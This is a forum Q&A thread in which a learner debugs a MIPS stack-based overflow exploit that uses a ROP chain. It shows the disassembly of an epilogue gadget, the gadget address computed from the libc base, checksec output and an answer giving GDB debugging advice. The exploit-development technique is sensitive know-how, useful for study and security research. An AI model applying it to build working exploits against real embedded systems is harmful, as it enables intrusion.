exploiting mips stack based overflow (rop chain)

Question

I'm trying to develop my first MIPS stack based exploit, using ROP chain technique with zero luck...I'm failing on the first ROP gadget and I can't figure out why. I'm following Bowcaster python framework and some blog posts I've googled. As the overflow I've found allowing me to overwrite too few S registers (S0 and S8 only) I need to jump to a function epilogue which will set S0-S8 from the stack. I was using IDA PRO with mipsrop plugin to locate the gadgets. I've tried gadgets from both vulnerable binary and libc, but with the same result. I'm seeing in GDB that the $RA register is set correctly to the address I've choose with mipsrop, but for some reason S0-S8 registers are not overwritten. The ASLR is not an issue here as I can confirm that by running ldd few times. I've choose a gadget with the address 000112EC, using IDA PRO, which looks like that : (I can't post more images - reputation)

LOAD:000112EC lw $ra, 0x48+var_4($sp)
LOAD:000112F0 lw $fp, 0x48+var_8($sp)
LOAD:000112F4 lw $s7, 0x48+var_C($sp)
LOAD:000112F8 lw $s6, 0x48+var_10($sp)
LOAD:000112FC lw $s5, 0x48+var_14($sp)
LOAD:00011300 lw $s4, 0x48+var_18($sp)
LOAD:00011304 lw $s3, 0x48+var_1C($sp)
LOAD:00011308 lw $s2, 0x48+var_20($sp)
LOAD:0001130C lw $s1, 0x48+var_24($sp)
LOAD:00011310 lw $s0, 0x48+var_28($sp)
LOAD:00011314 jr $ra
LOAD:00011318 addiu $sp, 0x48
LOAD:00011318 # End of function scandir

I've added the base libc address to it (echo 'obase=16;ibase=16;2AABE000+112EC' | bc) and I've get 0x2AACF2EC. As it's Big Endian processor I've send the string like this :

AAAA and the first gadget address

Below you can see the full output from GDB :

GDB output after the hit

As you can see only S0 and S8 was overwritten and none of S registers was restored from the stack.

What I'm doing wrong here? Please help :)

some checksec.sh output :

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /bin/vulnbin
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      No canary found   NX enabled    DSO             No RPATH   No RUNPATH   /lib/libc.so.0

score 0 · Answer 1 · answered May 17 '17 at 17:48

You have gdb output after the instructions run but not before (or during)

You should be single stepping and manually checking each load with x/wx $sp+

Could be your string was corrupted and those values in s0-s7 were in fact pulled from the stack as you asked it to do, where your buffer used to be but is now corrupted.

Also, do you have additional bytes in your overflow string after the new $ra value or does that terminate the string? If it's terminating the string then the s0-s7 registers will be filled with garbage stack data.

bottom line: breakpoint the first load, manually x/wx $sp+X each load before it occurs and stepi and confirm the result

If you need a static gdbserver I have a ton for various ARM, MIPS and MIPSEL architectures/ABIs @ embedded-toolkit

Also, I wouldn't rely too heavily on a framework until you've done it "by hand" at least a few times. Can't emphasize this enough — adam, May 17 '17 at 17:54

exploiting mips stack based overflow (rop chain)

1 Answers1